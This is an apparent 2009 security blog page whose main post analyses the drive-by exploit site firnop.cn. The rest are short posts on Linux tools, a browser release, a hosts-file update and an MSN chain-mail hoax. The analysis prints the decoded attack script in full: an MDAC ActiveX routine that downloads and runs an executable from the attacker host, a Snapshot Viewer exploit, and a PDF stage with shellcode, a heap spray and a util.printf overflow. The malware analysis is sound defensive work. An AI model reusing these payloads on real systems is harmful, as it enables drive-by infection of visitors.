Kudos to David Harley (Eset) for the heads up;

Magic Lantern Show in the UK?
http://www.eset.com/threat-center/blog/?p=392

Wednesday 7 January 2009

firnop.cn - MDAC + PDF + Snapshot viewer control exploits

I was asked to look at firnop.cn (IP: 195.24.78.242, PTR: B088.com) by Connie yesterday, due to it's containing some rather suspicious code. I was not to be disappointed.

As I told Connie, this one only allows access once per IP, after that, you get a lovely little 404. I thought this was only going to be a once per day job, but alas no, this is the second day and I still can't access the original code there now. Fear not, your clever blogger saved a copy of the original vURL result;

vURL Online - Results for firnop.cn
http://hosts-file.net/misc/firnop_cn/vURL_Online_-_firnop_cn.html

This shows some rather obscure code hidden once again in a form field, this time rosorur, which is then loaded dynamically courtesy of document.getElementById('rosorur').value. To decode this, we'll need two things;

1. Malzilla (malzilla.sourceforge.net)

Malzilla is my favourite tool for decoding obfuscased or encoded scripts, and has been since it's inception. If you're not using it already, and are working with malicious sites, give it a try.

2. Small change to the original code

The small change we need to make is to ditch the HTML, and move the content of the rosorur text box, to it's own variable. Once we've done this, we can simply change;

eval(document.getElementById('rosorur').value)

To;

eval(rosorur)

If we now run this through Malzilla, we're given the following results. The CLSID used in the code, is for the MSXML 4.0 component.

<object id=xmltarget classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5"></object>
<SCRIPT type='text/javascript'>
function errfuck()
{
  return true;
}
window.onerror=errfuck;
function dddec(str)
{
  cto="GsHkUqw1S2Kba0QPivRDnAyr9lJYm4TcF6IXo3Mx7BENtjCZpuf5gW8zVhLdeO";
  cfrom="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890";
  res="";
  for (i=0;i<str.length;i++)
  {
   c=str.charAt(i);
   pos=cto.indexOf(c);
   if (pos!=-1)
   res+=cfrom.charAt(pos);
   else
   res+=c;
  }
  return res;
}
function goMDAC()
{
  d8= 0;
  var Qy29Nd = document.createElement(dddec("SriHAU"));
  Qy29Nd.setAttribute("id",dddec("JqWefa"));
  Qy29Nd.setAttribute("classid",dddec("ARb1a:uMehZVVh-hVo8-ggMO-ed8o-OOZOzxZWem8h"));
  try
  {
   var LoWMFJ = Qy29Nd.CreateObject(dddec("KaSar.bUkHKl"),'');
   var d8 = 1;
  }
  catch(e)
  {
  }
  try
  {
   var PEELt6 = Qy29Nd.CreateObject(dddec("3PHRR.o22R1AKU1S9"),'');
   var d8 = 1;
  }
  catch(e)
  {
  }
  if(d8 == 1)
  {
   try
   {
    var JB7Ebp = Qy29Nd.CreateObject(dddec("lbnlRW.C5tBTTX"),'');
    JB7Ebp.open("GET","http://firnop.cn/getexe.php?h=11",false);
    JB7Ebp.send();
    LoWMFJ.type = 1;
    LoWMFJ.open();
    LoWMFJ.Write(JB7Ebp.responseBody);
    Frogxa = "..\\S87ekhV.exe";
    LoWMFJ.SaveToFile(Frogxa,2);
    eval(dddec("XmmtUh.3PHRRmnHAwUH(xkSQnK);"));
    //return 1;
   }
   catch(e)
   {
   }
  }
}
function goPDF()
{
  wnd=window;
  while (wnd.parent!=wnd)
  wnd=wnd.parent;
  wnd.location="getfile.php?f=vispdf";
}
function goSnap()
{
  var sfrom = 'http://firnop.cn/getexe.php?h=12';
  var fuckavo="SB";
  var x;
  var fuckavp="SB";
  var obj;
  var fuckavx="SB";
  var mycars = new Array();
  var fuckava="SB";
  mycars[0] = "c:/Program Files/Outlook Express/WAB.EXE";
  mycars[1] = "d:/Program Files/Outlook Express/WAB.EXE";
  mycars[2] = "e:/Program Files/Outlook Express/WAB.EXE";
  var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
  if(objlcx)
  {
   setTimeout('window.location = "ldap://"',3000);
   for (x in mycars)
   {
    obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")
    var buf1 = sfrom;
    var fuckavg="SB";
    var buf2=mycars[x];
    var fuckavj="SB";
    obj.Zoom = 0;
    obj.ShowNavigationButtons = false;
    obj.AllowContextMenu = false;
    obj.SnapshotPath = buf1;
    try
    {
     obj.CompressedPath = buf2;
     obj.PrintSnapshot();
    }
    catch(e)
    {
    }
   }
  }
  var fuckavqgga="SB";
  var fuckavqggxa="SBd";
}
setTimeout('goMDAC();',3500);
setTimeout('goSnap();',1);
try
{
  var obj = null;
  obj = new ActiveXObject("AcroPDF.PDF");
  if (!obj)
  {
   obj = new ActiveXObject("PDF.PdfCtrl");
  }
  if (obj)
  {
   document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
   setTimeout('goPDF();',5000);
  }
}
catch(e)
{
  document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
  setTimeout('goPDF();',5000);
}
</script>


Unfortunately, the only ones I could actually download, were f=pdf and f=vispdf, so lets analyze those shall we? First of all, we need to uncompress them. For this we'll use pdftk.

Once the Javascript is dumped, we see a Base64 encoded string that is decoded courtesy of the following;

function func(str) {
""b64s=""ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"";
""while(str.substr(-1,1)==""="")str=str.substr(0,str.length-1);
""var b=str.split(""""), i
""var s=Array(), t
""var lPos = b.length - b.length % 4
""for(i=0;i<lPos;i+=4){
""""t=(b64s.indexOf(b[i])<<18)+(b64s.indexOf(b[i+1])<<12)+(b64s.indexOf(b[i+2])>>6)+b64s.indexOf(b[i+3])
""""s.push( ((t>>16)&0xff), ((t>>8)&0xff), (t&0xff) )
""}
""if( (b.length-lPos) == 2 ){ t=(b64s.indexOf(b[lPos])<<18)+(b64s.indexOf(b[lPos+1])<<12); s.push( ((t>>16)&0xff)); }
""if( (b.length-lPos) == 3 ){ t=(b64s.indexOf(b[lPos])<<18)+(b64s.indexOf(b[lPos+1])<<12)+(b64s.indexOf(b[lPos+2])<<6); s.push( ((t>>16)&0xff), ((t>>8)&0xff) ); }
""for( i=s.length-1; i>=0; i-- ){
""""if( s[i]>=168 ) s[i]=AZ.charAt(s[i]-163)
""""else s[i]=String.fromCharCode(s[i])
""};
""eval(s.join(""""))
}


If we then have Malzilla decode this, we're given yet another encoded script, that this time will need handled a little differently;

vikekide2=unescape("%u03eb%ueb59%ue805%ufff8%uffff%u494f%u4949%u4949%u5149%u565a%u5854%u3336%u5630%u3458%u3041%u3642%u4848%u4230%u3033%u4342%u5856%u4232%u4244%u3448%u3241%u4441%u4130%u5444%u4442%u4251%u4130%u4144%u5856%u5a34%u4238%u4a44%u4d4f%u4e4b%u5142%u554c%u544c%u3343%u4c49%u4648%u4b49%u334e%u5041%u4842%u5346%u304c%u4949%u4e44%u4f4c%u4e4b%u5045%u4e4a%u4e4b%u4f4f%u4f4f%u4f4f%u5742%u544e%u4949%u5949%u5949%u4c43%u4f4d%u334a%u4a49%u5949%u4949%u5949%u3144%u4d49%u3945%u4144%u4e49%u4845%u4346%u3144%u4d49%u3941%u3144%u5441%u3144%u4e4c%u4a45%u4144%u4e4d%u3847%u4e41%u394c%u564c%u3144%u4e47%u4b49%u594c%u5644%u5144%u4d47%u584d%u4a4c%u4746%u4c4f%u4c50%u4c4a%u5144%u4a48%u494c%u3644%u4144%u564b%u4f43%u3947%u4c42%u464c%u334f%u4e4d%u3941%u4c42%u4c48%u414c%u3550%u394d%u4d4e%u374b%u3742%u4c42%u4c48%u4c47%u5144%u5546%u3144%u4d4f%u4b4d%u594c%u554c%u544a%u574a%u594c%u354a%u4a4c%u4542%u4f4f%u4144%u4941%u3144%u4d4f%u5845%u494c%u454c%u554a%u474a%u394b%u494c%u354a%u3144%u5949%u394c%u554c%u3144%u3643%u5144%u4650%u514c%u454f%u4947%u4144%u3449%u4f43%u494d%u4c42%u3741%u4c49%u5949%u4949%u5949%u314c%u354f%u3946%u4c4b%u4c4f%u5648%u4c50%u4645%u4c43%u5144%u4441%u4f43%u394a%u4c42%u3741%u4a46%u3949%u4949%u3949%u514c%u454f%u484c%u4c4f%u4d4f%u3149%u4a47%u3149%u4e4e%u3643%u4149%u4a4f%u5149%u4c47%u514c%u5745%u4b49%u3144%u4445%u4f43%u4b49%u4c4c%u5648%u4c50%u3745%u3550%u394d%u494c%u4c45%u4f4a%u4b47%u4f4e%u5550%u4d4d%u394c%u494d%u4e41%u4f4e%u4949%u5949%u4a4c%u5549%u4c49%u4c49%u4c4c%u4c4f%u4c49%u5648%u4c50%u4645%u3144%u5445%u4c49%u4c4c%u3648%u4c50%u5649%u4c49%u3648%u4c50%u364d%u4a4c%u3549%u3345%u514e%u3549%u4e4e%u5642%u4c4a%u4c4b%u4c4f%u4c4c%u5648%u344b%u4c43%u4c42%u3344%u474b%u5747%u4a4c%u5549%u554c%u5741%u4b4f%u3648%u5648%u5648%u4d50%u4f4e%u4e4d%u4c49%u4e4b%u4f48%u4f4c%u4d4a%u4f4d%u4f4d%u4e4b%u4f4e%u4e4c%u4e4c%u3949%u4d50%u4f4e%u4e4d%u4c4c%u4e42%u4e4c%u4e4d%u4f4e%u4f46%u4d4d%u4f42%u4e4b%u4f4e%u4f4c%u4e4d%u4f48%u4e4b%u4e42%u4d4a%u3949%u4c50%u4f42%u4f47%u4d4e%u4e41%u4f4e%u4f4c%u5949%u4d4e%u4e41%u4f42%u4e4d%u4c4d%u4f41%u4e4b%u4f4e%u4f4a%u4f4d%u3949%u4d45%u4f48%u4f4a%u4f4d%u4d45%u4f42%u4f4b%u4e4b%u4f4a%u4e4b%u4e42%u4d4a%u4949%u4e4e%u4e4b%u4f45%u4f46%u4f48%u4f47%u5949%u4c4e%u4c4b%u4d45%u4d4d%u4f48%u4e50%u4f47%u4f45%u4f48%u4f4a%u4f4d%u4c4d%u4f48%u4d4f%u4f42%u4f45%u4f4e%u4d4a%u3949%u364a%u3746%u5746%u5742%u434c%u524f%u324f%u4648%u5649%u3744%u3650%u364f%u3742%u3250%u4643%u4650%u324f%u5647%u4645%u3746%u3645%u574a%u5645%u4250%u5742%u564a%u5742%u434f%u564a%u534d%u5343%u3341%u4842%u005a");var robedimup=unescape("%u0A0A%u0A0A");var tupari=20;var tosib=tupari+vikekide2.length;while(robedimup.length<tosib)robedimup+=robedimup;var vamuniveso=robedimup.substring(0,tosib);var sevusupo=robedimup.substring(0,robedimup.length-tosib);while(sevusupo.length+tosib<0x60000)sevusupo=sevusupo+sevusupo+vamuniveso;var bibale=new Array();for(lepefela6=0;lepefela6<1200;lepefela6++){bibale[lepefela6]=sevusupo+vikekide2}var rufirubed5=1299999999999999999988888888888888888888888888888888888888888888888888888888888888888
8888888888888888888888888888888888888888888888888888888888888888888888888888888888888
8888888888888888888888888888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888888888888888888;util.printf("%45000f",rufirubed
5);


If we try having Malzilla actually decode this, Malzilla will freeze and crash, so instead, we'll have it convert the string to Hex, then save that. This gives us a new .bin file containing a hex dump. Loading this in Malzilla and using it's Shellcode Analyzer shows:



This shows us the executable coming from;

firnop.cn/getexe.php?h=32

MD5: E27BB8F8ADEB613305F5DE9A68C125DB

HTTP/1.1 200 OK
Date: Thu, 08 Jan 2009 10:16:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Length: 85504
Content-Disposition: attachment; filename=update.exe
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/octet-stream


Detection sadly, is rubbish;

http://www.virustotal.com/analisis/1fac7fccd549f08c83373ab686062b0c

Sandbox report will be added once it's finished (tried Anubis but for some reason, it failed with an "XML could not be found" error)

/edit 12-01-2009

Sadly, the sandboxes still haven't gotten back to me (submitted to Anubis and MS's sandboxes). However, I've just noticed on Honeyblogs feed that CWSandbox has this one (or a variant of it atleast as it's network activity shows firnop.cn), so that'll have to do;

https://cwsandbox.org/?page=report&analysisid=879663&password=vqtgp

Tuesday 6 January 2009

Keryx: Update your Linux system without an internet connection!

Though in most North American cities one cannot find a spot without at least a weak WiFi signal, many of us Linux geeks still live in rural areas with less Internet connectivity. Also, in various non-Westernized nations, there is a growing number of Linux users who may have a computer at home, but cannot afford a decent connection. For both groups, software updates typically demand an Internet connection, which can make updating difficult if not impossible. There is now a solution though, a new program called Keryx.

Keryx was written by Southern Illinois University computer science student Chris Oliver, who wanted a way to download software and updates for Ubuntu systems that had little or no connectivity. Simply put Keryx on your pen drive, use it to create a new project file which retains a copy of your software sources and other system details, then take the pen drive to a computer with a better connection. Via it’s Synaptic like interface, users can then select all updates for download, plus select any other software they may want to install, complete with dependency resolution.

Read the full article/tutorial by Douglass Clem over at;

http://crashsystems.net/2009/01/keryx-tutorial/

Homepage:
http://keryx.betaserver.org/

Courtesy Earthling Series #6 @ CoU
http://www.calendarofupdates.com/updates/index.php?showtopic=17001&pid=73830

Orca Browser 1.1 RC2 Released!

Why choose Orca Browser?

Orca Browser is an extremely fast and user friendly web browser, designed to add more functions on to the latest version of Firefox. Not only does Orca Browser contains all the features, such as security, low memory usage, spell-checker, built-in download manager, etc. from a typical Gecko based browser, it also improves the speed, adds built-in features like an AD Blocker, Flash Blocker, Online Profile Storage, auto Form-Filler, and a Outlook-Style RSS Reader. The auto Form-Filler helps to memorize or fill different types of web forms and passwords. It can also protect them with a master security password. Online Profile Storage allows users to create their own account. With their username and password, users can choose to save or access their personal data such as bookmarks, AutoFills, and RSS feeds remotely from any computer.

Changes in this release:

  • * Fixed the DDE bug that kept opening htm/html files in Avant Browser
  • * Fixed the unresponsive tab switching bug
  • * Fixed the bug stopping Orca Browser from tiling properly along with other application windows
  • - Removed the feature to start up another application through pressing commands to start->run box
  • * Fixed unworking navigation buttons bug in Flash
  • * Fixed the bug where downloading files stopped if Orca Browser was closed
  • * Fixed the bug stopping Orca Browser from reloading saved pages when restarting it after installing newfirefox addons
  • * Fixed some translation issues
  • * Fixed the bug where the URL drop down list screened up the address bar when the tab bar was set to thebottom
  • * Fixed the bug that kept Orca Browser from signing in some websites
  • * Fixed the bug that kept the side bar blank when history panel was set default
  • * Fixed the miscoded keyword bug if searching a selected text through dragging and dropping
  • * Fixed the miscoded hint bug if hovering the mouse over a bookmark item in Side Bar
  • * Fixed the unabling to organize bookmarks bug when setting Orca Browser to use IE favorites
  • * Fixed the F6 & (ALT + D) not working bug when the focus was already at Address Bar
  • * Fixed the bug stopping Orca Browser from callling the default search engine through searching keywords from Address Bar
  • * Fixed the bug stopping the Address Bar drop down list from matching the inputting keywords
  • * Fixed the unsupporting Chinese username issue in AutoFill


Download:
http://dl.filekicker.com/send/file/166091-YKTW/osetup.exe
http://avant.it-mate.co.uk/dl/Orca_Browser/RC/1_1/osetup1_1_RC2.exe

References:

Avant goes Gecko
http://mysteryfcm.co.uk/?mode=News&date=14-09-2005

Dr Orca goes Beta
http://www.temerc.com/forums/viewtopic.php?f=22&t=1257

Sunday 4 January 2009

hpHOSTS - UPDATED January 5th, 2009

hpHOSTS - UPDATED January 5th, 2009

The hpHOSTS Hosts file has been updated. There is now a total of 53,952 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 05/01/2009 05:26
  2. Last Verified: 05/01/2009 05:00

Download hpHosts now!
http://hosts-file.net/?s=Download

Sorry guys, you've been hoaxed, MSN is NOT closing down!

I received a forwarded e-mail earlier, and though am well aware that people are still gullible enough to believe anything anyone tells them, still find myself annoyed by those that send this rubbish. Especially when they're believing a scam that is now at least 8 YEARS OLD (as referenced by the 2001 BBC article the hoax points you to in order to verify what they are telling you).

This particular e-mail reads;

Hi, this is Tara and John, the directors of MSN,

Sorry for the interruption but MSN is closing down. This is because too many inconsiderate people are taking up all the names (e.g. Making up lots of different accounts for just one person, etc.), we only have 587 names left. If you would like to close your account, DO NOT SEND THIS MESSAGE ON. If you would likr to keep your account, then SEND THIS MESSAGE TO EVERYONE ON YOUR CONTACT LIST.

This is no joke, we will be shutting down the servers.
Send it on, thanks.


P.S. WHOEVER DOES NOT SEND THIS MESSAGE, YOUR ACCOUNT WILL BE CLOSED AND IT WILL COST YOU 10.00 A MONTH TO USE. SEND THIS TO EVERYONE ON YOUR CONTACT LIST. NOW YOU KNOW WHAT TO DO. PLEASE DO NOT FORWARD THIS or REPLY. COPY THE WHOLE EMAIL. GO BACK TO YOUR INBOX AND CLICK ON NEW. AND PASTE THANKYOU FOR YOUR ATTENTION.


This is no joke if you dont believe us then go to this site: http://news.BBC.co.UK/1/hi/business/1189119.stm and see for yourself. Anyways once you've sent this message to at least 18 contacts, your MSN icon will become blue. Please copy and paste, dont forward because people wont read them


Elaine


Lets go through this bit by bit shall we? First and foremost, even if the MSN directors were named "Tara and John", they would NOT be sending this kind of thing out themselves, and certainly not via e-mail. You'd see a press release or some kind of media publication DIRECTLY ON THE MICROSOFT WEBSITE, several MONTHS (if not a year or two) before it actually happened.

Secondly, MSN is NOT closing down and likely never will be (FYI, MSN = Hotmail = Live). It is also NOT running out of names for you to choose from - again, the likelyhood of this happening is about the same as the likelyhood of myself actually owning Microsoft.

Thirdly, even if this were the case, Microsoft would NOT ask you to send anything to anyone in order to keep your account. If MSN/Hotmail/Live truly was closing, it wouldn't matter what you did - you'd still lose your account.

Fourth, the e-mail references an article on the BBC website, that it claims can confirm what they are telling you - it won't. What the article DOES tell you is that;

1. The article on the BBC website is from 2001, 8 YEARS AGO
2. The article told you that Microsoft were NOT going to charge MSN/Hotmail users for existing services;

"Microsoft stresses that the site's core facilities including Hotmail will remain free.

Fees will be demanded for extra services that are now under development, such as an advanced filter system to protect email accounts from junk mail"


This isn't the first time this particular e-mail (and various incarnations of such) has done the rounds either, Sophos have seen it before (2006), as have many other people.

I cannot stress enough, if someone sends you an e-mail claiming one thing or another, VERIFY WHAT THEY ARE TELLING YOU and NEVER "send it to everyone on your contact list" (or whatever the wording is that they decide to use). For further information;

Hoax Slayer
http://www.hoax-slayer.com

Snopes
http://snopes.com

Montana Menagerie - Hoaxes, Spam and Phishing scams. The countless ways miscreants try to scam their way into your wallet.
http://www.montanamenagerie.org/forum/viewforum.php?f=7

TeMerc Internet Countermeasures - Phishing and Spam
http://temerc.com/forums/viewforum.php?f=41

Saturday 3 January 2009

A call for volunteers, hpHosts needs YOU!

Since taking over hpHosts a couple of years ago, I've made several major changes, removed several hundreds domains, and continue to add/update and remove several hundred more on an on-going basis (now with the help of 3 friends).

One of the more major changes I made, was to add classifications for all of the sites in the database, where time allowed. Unfortunately I've still not had time to classify all of them, and as it stands, there are currently 9,177 domains still requiring classification.

I'd very much like to request volunteers to go through those still requiring classification, and send me their classification suggestions. How do you do this you ask? Simple, sort of. All you need to do, is drop by the Browse Database section of the website, filter the list by classification by clicking [ Unclassified ] and research the sites listed.

Note, many of the sites WILL infect your computer if visited directly, so you'll need to either use a spare machine, or if you are familiar enough with code, view the sites code to see what it does. For hints on safely viewing a malicious website, please see;

TeMerc Malware Forensics Instructional Guide
http://temerc.com/forums/viewtopic.php?f=27&t=5703

The list of possible classifications are quite clear, and so it should be easy enough to determine if a site fits one of them (if it does, all I need to know is which one it fits and why) - if not, let me know and it'll usually be removed.

Friday 2 January 2009

Next hpHosts release

Just an update folks. I know the hpHosts release is a little late. The sites are currently onto the second round of validation (there's currently 1657 not resolving).

Short of a major catastophy, the next release will be out on Monday January 5th.

As an aside, I found an issue with vURL Online earlier, concerning the two it-mate.co.uk servers. This issue has been fixed and you should now be able to dissect sites with these servers without issue.

I've also updated the hpHosts website to allow for changes and updates to the WhoIs servers, so there should be less problems obtaining WhoIs details (especially for domains with double TLD's such as .ac.uk)